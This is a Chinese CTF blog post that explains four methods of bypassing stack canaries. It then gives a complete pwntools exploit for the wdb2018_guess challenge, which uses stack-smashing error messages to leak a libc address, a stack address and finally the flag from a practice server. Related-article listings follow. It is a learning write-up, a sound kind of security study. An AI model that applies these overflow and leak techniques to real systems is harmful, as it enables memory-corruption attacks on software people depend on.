【八芒星计划】绕过canary

最新推荐文章于 2023-12-23 09:52:46 发布
最新推荐文章于 2023-12-23 09:52:46 发布
阅读量656 收藏 1
点赞数 1
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/108074065
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

本篇记录绕过canary的方法

文章目录

前言

canary的绕过方法一共有4种

①通过read函数泄露canary。关键的一点就是read函数读取字符串的时候不会在末尾加上“\x00”,这就是gets函数不能用来泄露canary的原因(有些输出函数遇到‘\0’会截断)。

②暴力破解canary。这种方法利用起来有限制,就是一般要程序中有fork函数创造出子进程,因为子进程是父进程复制出来的,所以canary也就跟父进程相同,在子进程中覆盖canary后报错就会退回到父进程,此时canary的值是不会改变的。

③劫持stackchkfail。因为canary被覆盖的时候会调用这个函数,所以如果我们可以利用程序中的漏洞(比如格式化字符串)改got表中stackchkfail的地址为one_gadget的地址就能getshell。

④stack smashing 利用stackchkfail的报错信息。在报错信息中,会将你发生栈溢出的程序名调用输出,其位置位于argv[0],我们可以将argv[0]的地址改写为我们想要获取的内容的地址,使它随着错误提示一起输出。
stack_end在utf8那里 函数是__environ

wdb2018_guess

stack smashing
有趣的题目,本题fork了三次,创建了3个子进程,那么就会gets三次
fork的问题看这里

https://blog.csdn.net/carol2358/article/details/108371440

在这里插入图片描述
利用三次gets和canary,我们可利用stack smash来获得三次信息
第一次获得libc,第二次获得栈地址,第三次获得flag
覆盖argv[0],也就是程序名所在的位置(注意main的参数是从右至左入栈的,但是argv中有一个参数不一致,那就是stack_end,他是用来分隔一般栈的内容和argc,argv,envp之类的内容的,所以他会在argc之前,看了一下值好像都是0x1c,暂时不解)
先用puts的got来获得libcbase,用libcbase获得environ的地址,也就是envp[0]的地址(用i stack, p environ命令查看)

一般情况:
程序名
0
envp[0]

然后第二次输入通过environ来获得stack的地址
第三次就可以通过flag的地址来获得flag了
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './GUESS'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26816)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

p = 'a'*0x128 + p64(elf.got['puts'])
sla('Please type your guessing flag', p)
ru('*** stack smashing detected ***: ')
fun_addr = uu64(rc(6))
info('fun_addr', fun_addr)
libc = LibcSearcher('puts', fun_addr)
libc_base = fun_addr - libc.dump('puts')
environ_addr = libc_base + libc.dump('__environ')
info('libc_base', libc_base)
info('environ_addr', environ_addr)
p = 'a'*0x128 + p64(environ_addr)
sl(p)
ru('*** stack smashing detected ***: ')
stack_addr = uu64(rc(6))
info('stack_addr', stack_addr)
p = 'a'*0x128 + p64(stack_addr - 0x168)
sl(p)
r.interactive()
真岛忍
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Canary绕过方法
03-31
题目下载
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
02-24
Canary主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。Stackcanary保护机制在刚进入函数时,在栈上放置...
绕过canary原理及其利用方式
glhdbk的博客
09-07 4209
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
Canary以及Canary绕过技巧
Sakura给爷pwn全场
12-11 315
canary介绍与绕过技巧: https://blog.csdn.net/weixin_43713800/article/details/105273284
【pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 5360
Canary各种绕过姿势
ex2(canary绕过
qq_51687381的博客
05-25 456
先上IDA看一波反汇编
HttpCanary.pem证书
07-26
安装HttpCanary之后,需要安装证书,有些手机需要在设置里自行安装,需要导入此文件进行安装。
HttpCanary_3.3.6.zip
04-29
安卓抓包工具,支持安卓10
Canary机制的绕过
weixin_30822451的博客
04-22 296
目标程序下载 提取码:8ypi 1.检查程序开启了哪些安全保护机制 Canary与NX开启了 Canary机制简介 64位的canary机制,会在函数头部添加: mov rax,QWORD PTR fs:0x28 //从fs:0x28寄存器中取一个值 mov QWORD PTR [rbp-0x8],rax //写入当...
【PWN学习】cannary绕过方式汇总
最新发布
weixin_41748164的博客
12-23 697
利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。
canary介绍与绕过技巧
0pt1mus
04-02 6372
Canary 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当...
Canary机制及绕过策略
helloworlddm的博客
06-14 3185
Canary机制 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段(只是缓解机制,不能彻底的阻止),当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让 shellcode
Canary保护机制及绕过
二狗的博客
01-29 811
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
canary机制及绕过策略
qq_44119514的博客
08-20 329
[pwn]ROP:三道题讲解花式绕过Canary栈保护
热门推荐
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
Canary学习(爆破Canary
至臻求学,胸怀云月
01-30 3721
one-by-one 爆破Canary原理 对于Canary,虽然每次进程重启后Canary不同,但是同一个进程中的不同线程的Cannary是相同的,并且通过fork函数创建的子进程中的canary也是相同的,因为fork函数会直接拷贝父进程的内存。 最低位为0x00,之后逐次爆破,如果canary爆破不成功,则程序崩溃;爆破成功则程序进行下面的逻辑。由此可判断爆破是否成功。 我们可以利用这样的...
pwn题绕过canary保护机制新手版
educat0r的博客
03-27 2920
介绍 通俗来说,canary保护是为了防止程序能够被溢出的地方不让溢出 比如一个输入函数能够输入100个字节的内容,但是它的变量只有50个字节的大小,因为这个程序是可以接受你输入超过50个字节大小的内容的。我们就可以先输入50个字节的无用数据,然后再输入一串你想跳转到的地址把后面的return函数存在的原本的地址覆盖了,,这样程序执行完这个输入函数就会跳转到你输入的那个地址去。 而canary则是...
HttpCanary
02-15
HttpCanary 是一款移动端应用,用于抓取和分析移动端网络请求数据。它允许您捕获移动设备上的所有 HTTP 和 HTTPS 请求和响应,并通过其人性化的界面展示您的网络通信的详细信息。这对于调试应用程序,分析网络性能和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值